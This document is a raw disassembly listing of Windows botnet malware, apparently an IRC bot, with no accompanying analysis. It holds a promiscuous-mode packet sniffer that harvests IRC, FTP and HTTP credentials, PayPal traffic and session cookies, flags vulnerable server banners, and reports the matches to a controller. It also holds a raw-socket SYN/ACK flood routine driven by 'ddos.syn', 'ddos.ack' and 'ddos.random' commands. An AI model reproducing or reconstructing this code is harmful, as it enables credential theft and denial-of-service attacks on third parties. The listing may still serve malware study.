push [ebp+var_102A0]
call ds:dword_4CB584 ; htons
movzx eax, ax
push eax
push [ebp+var_C]
call ds:dword_4CB6E0 ; inet_ntoa
push eax
lea eax, [edi+edi*2]
mov eax, dword_4355BC[eax*8]
push off_435598[eax*4]
lea eax, [ebp+var_2B4]
push offset dword_435E40
push 200h
push eax
call sub_41B980
add esp, 1Ch
cmp [ebp+var_28], esi
jnz short loc_4122D4
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409A73
add esp, 14h
loc_4122D4: ; CODE XREF: sub_411FD6+2DC�j
lea eax, [ebp+var_2B4]
push eax
call sub_4151AD
pop ecx
jmp loc_4121B9
; ---------------------------------------------------------------------------
loc_4122E6: ; CODE XREF: sub_411FD6+20E�j
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
push offset dword_435E14
lea eax, [ebp+var_2B4]
push 200h
push eax
call sub_41B980
add esp, 10h
cmp [ebp+var_28], esi
pop ebx
jnz short loc_41232C
push esi
lea eax, [ebp+var_2B4]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_B0]
push eax
push [ebp+var_B4]
call sub_409A73
add esp, 14h
loc_41232C: ; CODE XREF: sub_411FD6+334�j
lea eax, [ebp+var_2B4]
push eax
call sub_4151AD
pop ecx
push [ebp+var_4]
call ds:dword_4CB6EC ; closesocket
push [ebp+var_30]
call sub_40B413
pop ecx
push esi
call dword_4270CC ; ExitThread
sub_411FD6 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_412352 proc near ; CODE XREF: sub_412661+213�p
; sub_412661+239�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ds:dword_4CE3C0, eax
mov eax, offset dword_4CE3C0
retn
sub_412352 endp
; =============== S U B R O U T I N E =======================================
sub_412361 proc near ; CODE XREF: sub_412661+2BF�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aBotSniff ; "Bot sniff"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_41237B
loc_412377: ; CODE XREF: sub_412361+29�j
; sub_412361+3A�j ...
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41237B: ; CODE XREF: sub_412361+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412377
push offset aPsniff_1 ; "[PSNIFF]:"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412377
push offset aPsniff_0 ; "PSNIFF//"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412377
push offset aJoin_0 ; "JOIN #"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_4123C3
loc_4123BF: ; CODE XREF: sub_412361+71�j
; sub_412361+82�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4123C3: ; CODE XREF: sub_412361+5C�j
push offset a302_0 ; "302 "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset a366 ; "366 "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset a_login_0 ; ":.login"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset aLogin_1 ; ":!login"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset aLogin_0 ; ":!Login"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset a_login ; ":.Login"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset a_ident ; ":.ident"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4123BF
push offset aIdent_0 ; ":!ident"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz loc_4123BF
push offset a_hashin ; ":.hashin"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz loc_4123BF
push offset aHashin ; ":!hashin"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412361 endp
; =============== S U B R O U T I N E =======================================
sub_412478 proc near ; CODE XREF: sub_412661+2F8�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aIrcSniff ; "IRC sniff"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_412492
loc_41248E: ; CODE XREF: sub_412478+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412492: ; CODE XREF: sub_412478+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_41248E
push offset aOper_0 ; "OPER "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_4124B8
loc_4124B4: ; CODE XREF: sub_412478+4F�j
; sub_412478+60�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4124B8: ; CODE XREF: sub_412478+3A�j
push offset aNick_1 ; "NICK "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4124B4
push offset aOper ; "oper "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4124B4
push offset aYouAreNowAnIrc ; "You are now an IRC Operator"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412478 endp
; =============== S U B R O U T I N E =======================================
sub_4124EE proc near ; CODE XREF: sub_412661+32E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aFtpSniff ; "FTP sniff"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_412508
loc_412504: ; CODE XREF: sub_4124EE+29�j
; sub_4124EE+3A�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412508: ; CODE XREF: sub_4124EE+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412504
push offset aNick_1 ; "NICK "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412504
push offset a220 ; "220 "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_41253F
loc_41253B: ; CODE XREF: sub_4124EE+60�j
; sub_4124EE+71�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_41253F: ; CODE XREF: sub_4124EE+4B�j
push offset a230 ; "230 "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_41253B
push offset aUser_3 ; "USER "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_41253B
push offset aPass_1 ; "PASS "
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_4124EE endp
; =============== S U B R O U T I N E =======================================
sub_412575 proc near ; CODE XREF: sub_412661+35F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aHttpSniff ; "HTTP sniff"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_41258F
loc_41258B: ; CODE XREF: sub_412575+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_41258F: ; CODE XREF: sub_412575+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_41258B
push offset aPaypal ; "paypal"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_4125B5
loc_4125B1: ; CODE XREF: sub_412575+4F�j
; sub_412575+60�j ...
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_4125B5: ; CODE XREF: sub_412575+3A�j
push offset aPaypal_0 ; "PAYPAL"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4125B1
push offset aPaypal_com_0 ; "PAYPAL.COM"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4125B1
push offset aPaypal_com ; "paypal.com"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_4125B1
push offset aSetCookie ; "Set-Cookie:"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_412575 endp
; =============== S U B R O U T I N E =======================================
sub_4125FC proc near ; CODE XREF: sub_412661:loc_412A26�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset aVulnSniff ; "VULN sniff"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_412616
loc_412612: ; CODE XREF: sub_4125FC+29�j
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_412616: ; CODE XREF: sub_4125FC+14�j
push offset aFaak ; "#FAAK#"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412612
push offset aOpenssl0_9_6 ; "OpenSSL/0.9.6"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jz short loc_41263C
loc_412638: ; CODE XREF: sub_4125FC+4F�j
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_41263C: ; CODE XREF: sub_4125FC+3A�j
push offset aServUFtpServer ; "Serv-U FTP Server"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
jnz short loc_412638
push offset aOpenssh_2 ; "OpenSSH_2"
push esi
call sub_41B900
pop ecx
test eax, eax
pop ecx
pop esi
setnz al
retn
sub_4125FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412661 proc near ; DATA XREF: sub_401ACD+427D�o
var_113B8 = byte ptr -113B8h
var_113AF = byte ptr -113AFh
var_113AC = dword ptr -113ACh
var_113A8 = dword ptr -113A8h
var_113A4 = dword ptr -113A4h
var_1138C = byte ptr -1138Ch
var_13B8 = byte ptr -13B8h
var_BB8 = byte ptr -0BB8h
var_3B8 = byte ptr -3B8h
var_3B7 = byte ptr -3B7h
var_2B8 = byte ptr -2B8h
var_B8 = dword ptr -0B8h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 113B8h
call sub_41BB20
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 25h
mov esi, eax
pop ecx
lea edi, [ebp+var_B8]
rep movsd
push 1
xor ebx, ebx
pop esi
lea edi, [ebp+var_3B7]
push 3Fh
mov [eax+90h], esi
pop ecx
xor eax, eax
mov [ebp+var_3B8], bl
push 0FFh
rep stosd
stosw
lea eax, [ebp+var_3B8]
mov [ebp+var_20], 2
push eax
mov [ebp+var_1E], bx
mov [ebp+var_1C], ebx
call ds:dword_4CB668 ; gethostname
lea eax, [ebp+var_3B8]
push eax
call ds:dword_4CB6D8 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_8]
push eax
call sub_41C310
mov eax, [ebp+var_8]
add esp, 0Ch
mov [ebp+var_1C], eax
push ebx
push 3
push 2
call ds:dword_4CB6D4 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_10], edi
jnz short loc_412707
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_412707: ; CODE XREF: sub_412661+9B�j
lea eax, [ebp+var_20]
push 10h
push eax
push edi
call ds:dword_4CB680 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_41277D
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_4361C0
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_412759
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409A73
add esp, 14h
loc_412759: ; CODE XREF: sub_412661+D6�j
lea eax, [ebp+var_2B8]
push eax
call sub_4151AD
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_34]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_41277D: ; CODE XREF: sub_412661+B6�j
push ebx
lea eax, [ebp+var_24]
push ebx
push eax
push ebx
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push 98000001h
push edi
mov [ebp+var_C], esi
call ds:dword_4CB600 ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_412803
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_2B8]
push offset unk_436190
push eax
call sub_41B886
add esp, 0Ch
cmp [ebp+var_2C], ebx
jnz short loc_4127DF
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409A73
add esp, 14h
loc_4127DF: ; CODE XREF: sub_412661+15C�j
lea eax, [ebp+var_2B8]
push eax
call sub_4151AD
pop ecx
push edi
call ds:dword_4CB6EC ; closesocket
push [ebp+var_34]
call sub_40B413
pop ecx
push ebx
call dword_4270CC ; ExitThread
loc_412803: ; CODE XREF: sub_412661+13C�j
mov esi, 200h
loc_412808: ; CODE XREF: sub_412661+1D6�j
; sub_412661+1FB�j ...
mov edi, 0FFFFh
lea eax, [ebp+var_113B8]
push edi
push ebx
push eax
call sub_41B590
add esp, 0Ch
lea eax, [ebp+var_113B8]
push ebx
push edi
push eax
push [ebp+var_10]
call ds:dword_4CB66C ; recv
cmp [ebp+var_113AF], 6
jnz short loc_412808
push [ebp+var_113A4]
mov edi, dword_4271E4
call edi ; htons
push [ebp+var_113A4+2]
movzx eax, ax
mov [ebp+arg_0], eax
call edi ; htons
cmp [ebp+arg_0], 6Eh
movzx edi, ax
jz short loc_412808
cmp [ebp+arg_0], 19h
jz short loc_412808
cmp edi, 6Eh
jz short loc_412808
cmp edi, 19h
jz short loc_412808
push [ebp+var_113AC]
call sub_412352
pop ecx
push dword ptr [eax]
call dword_4271E8 ; inet_ntoa
push eax
lea eax, [ebp+var_13B8]
push offset aS_2 ; "%s"
push eax
call sub_41B886
push [ebp+var_113A8]
call sub_412352
add esp, 10h
push dword ptr [eax]
call dword_4271E8 ; inet_ntoa
push eax
lea eax, [ebp+var_BB8]
push offset aS_2 ; "%s"
push eax
call sub_41B886
lea eax, [ebp+var_1138C]
mov [ebp+var_4], ebx
push eax
call sub_41AFE0
add esp, 10h
test eax, eax
jle short loc_412906
loc_4128D2: ; CODE XREF: sub_412661+2A3�j
mov eax, [ebp+var_4]
cmp [ebp+eax+var_1138C], 0Dh
lea eax, [ebp+eax+var_1138C]
jnz short loc_4128E9
mov byte ptr [eax], 20h
loc_4128E9: ; CODE XREF: sub_412661+283�j
cmp byte ptr [eax], 0Ah
jnz short loc_4128F1
mov byte ptr [eax], 20h
loc_4128F1: ; CODE XREF: sub_412661+28B�j
inc [ebp+var_4]
lea eax, [ebp+var_1138C]
push eax
call sub_41AFE0
cmp [ebp+var_4], eax
pop ecx
jl short loc_4128D2
loc_412906: ; CODE XREF: sub_412661+26F�j
cmp [ebp+arg_0], 50h
jz loc_4129B9
cmp edi, 50h
jz loc_4129B9
lea eax, [ebp+var_1138C]
push eax
call sub_412361
test al, al
pop ecx
jz short loc_41294D
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_43615C
jmp loc_4129E8
; ---------------------------------------------------------------------------
loc_41294D: ; CODE XREF: sub_412661+2C7�j
cmp edi, 50h
jz short loc_4129B9
lea eax, [ebp+var_1138C]
push eax
call sub_412478
test al, al
pop ecx
jz short loc_412983
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_436128
jmp short loc_4129E8
; ---------------------------------------------------------------------------
loc_412983: ; CODE XREF: sub_412661+300�j
cmp edi, 50h
jz short loc_4129B9
lea eax, [ebp+var_1138C]
push eax
call sub_4124EE
test al, al
pop ecx
jz short loc_4129B9
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_4360F4
jmp short loc_4129E8
; ---------------------------------------------------------------------------
loc_4129B9: ; CODE XREF: sub_412661+2A9�j
; sub_412661+2B2�j ...
lea eax, [ebp+var_1138C]
push eax
call sub_412575
test al, al
pop ecx
lea eax, [ebp+var_1138C]
push eax
jz short loc_412A26
lea eax, [ebp+var_BB8]
push edi
push eax
lea eax, [ebp+var_13B8]
push [ebp+arg_0]
push eax
push offset unk_4360BC
loc_4129E8: ; CODE XREF: sub_412661+2E7�j
; sub_412661+320�j ...
lea eax, [ebp+var_2B8]
push esi
push eax
call sub_41B980
add esp, 20h
cmp [ebp+var_2C], ebx
jnz loc_412808
push ebx
lea eax, [ebp+var_2B8]
push [ebp+var_30]
push eax
lea eax, [ebp+var_B4]
push eax
push [ebp+var_B8]
call sub_409A73
add esp, 14h
jmp loc_412808
; ---------------------------------------------------------------------------
loc_412A26: ; CODE XREF: sub_412661+36E�j
call sub_4125FC
test al, al
pop ecx
jz loc_412808
lea eax, [ebp+var_1138C]
push eax
lea eax, [ebp+var_BB8]
push edi
push eax
push [ebp+arg_0]
lea eax, [ebp+var_13B8]
push eax
push offset unk_436084
jmp short loc_4129E8
sub_412661 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412A54 proc near ; DATA XREF: sub_401ACD+6543�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call dword_4270A8 ; GetTickCount
push eax
call sub_41B8D8
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_412E40
add esp, 14h
push eax
lea eax, [ebp+var_494]
push offset unk_4361EC
push eax
call sub_41B886
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_412AE7
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_409A73
add esp, 14h
loc_412AE7: ; CODE XREF: sub_412A54+71�j
lea eax, [ebp+var_494]
push eax
call sub_4151AD
push [ebp+var_290]
call sub_40B413
pop ecx
pop ecx
push esi
call dword_4270CC ; ExitThread
pop edi
pop esi
sub_412A54 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412B09 proc near ; CODE XREF: sub_412E40+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_4CB5C4 ; WSAStartup
test eax, eax
jz short loc_412B49
xor eax, eax
jmp loc_412E3C
; ---------------------------------------------------------------------------
loc_412B49: ; CODE XREF: sub_412B09+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_4CB6F8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_412E34
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call ds:dword_4CB634 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_412E2A
push [ebp+arg_C]
mov [ebp+var_58], 2
call ds:dword_4CB654 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call ds:dword_4CB654 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call ds:dword_4CB654 ; htons
mov [ebp+var_12], ax
call sub_41B8E2
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_4CB654 ; htons
push 12345678h
mov [ebp+var_14], ax
call ds:dword_4CB650 ; htonl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_412C19
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_412C6D
; ---------------------------------------------------------------------------
loc_412C19: ; CODE XREF: sub_412B09+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_412C35
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_412C6D
; ---------------------------------------------------------------------------
loc_412C35: ; CODE XREF: sub_412B09+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_41C070
pop ecx
test eax, eax
pop ecx
jnz short loc_412C6D
call sub_41B8E2
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_41B8E2
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_412C6D: ; CODE XREF: sub_412B09+10E�j
; sub_412B09+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call ds:dword_4CB654 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call dword_427134 ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call dword_427130 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_41D280
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_412CBB: ; CODE XREF: sub_412B09+2E2�j
; sub_412B09+2F0�j
mov [ebp+var_4], bx
call sub_41B8E2
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_4CB654 ; htons
mov [ebp+var_14], ax
call sub_41B8E2
mov edi, eax
shl edi, 10h
call sub_41B8E2
or edi, eax
push edi
call ds:dword_4CB654 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_4CB650 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_4CB654 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41C310
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_41C310
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40AC69
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41C310
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_41C310
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_41B590
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40AC69
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_41C310
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call ds:dword_4CB6B8 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_412DFE
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call dword_427130 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_412E27
jl loc_412CBB
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_412E27
jmp loc_412CBB
; ---------------------------------------------------------------------------
loc_412DFE: ; CODE XREF: sub_412B09+2CB�j
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_436214
push eax
call sub_41B886
lea eax, [ebp+var_F4]
push eax
call sub_4151AD
add esp, 10h
jmp short loc_412E2A
; ---------------------------------------------------------------------------
loc_412E27: ; CODE XREF: sub_412B09+2E0�j
; sub_412B09+2EE�j
mov ebx, [ebp+arg_8]
loc_412E2A: ; CODE XREF: sub_412B09+78�j
; sub_412B09+31C�j
push [ebp+var_20]
call ds:dword_4CB6EC ; closesocket
pop esi
loc_412E34: ; CODE XREF: sub_412B09+5B�j
call ds:dword_4CB5AC ; WSACleanup
mov eax, ebx
loc_412E3C: ; CODE XREF: sub_412B09+3B�j
pop edi
pop ebx
leave
retn
sub_412B09 endp
; =============== S U B R O U T I N E =======================================
sub_412E40 proc near ; CODE XREF: sub_412A54+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_40AAFA
push [esp+10h+arg_4]
mov esi, eax
call sub_41B779
push [esp+14h+arg_C]
mov ebx, eax
call sub_41B779
mov edi, eax
call sub_41B8E2
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_412B09
add esp, 20h
test eax, eax
jnz short loc_412E8F
push 1
pop eax
loc_412E8F: ; CODE XREF: sub_412E40+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_412E40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_412E9E proc near ; DATA XREF: sub_401ACD+6722�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call ds:dword_4CB6D4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_412F39
call ds:dword_4CB5E8 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_436314
push eax
call sub_41B886
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_412F1C
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_409A73
add esp, 14h
loc_412F1C: ; CODE XREF: sub_412E9E+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_4151AD
push [ebp+var_38]
call sub_40B413
pop ecx
pop ecx
push edi
call dword_4270CC ; ExitThread
loc_412F39: ; CODE XREF: sub_412E9E+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call ds:dword_4CB634 ; setsockopt
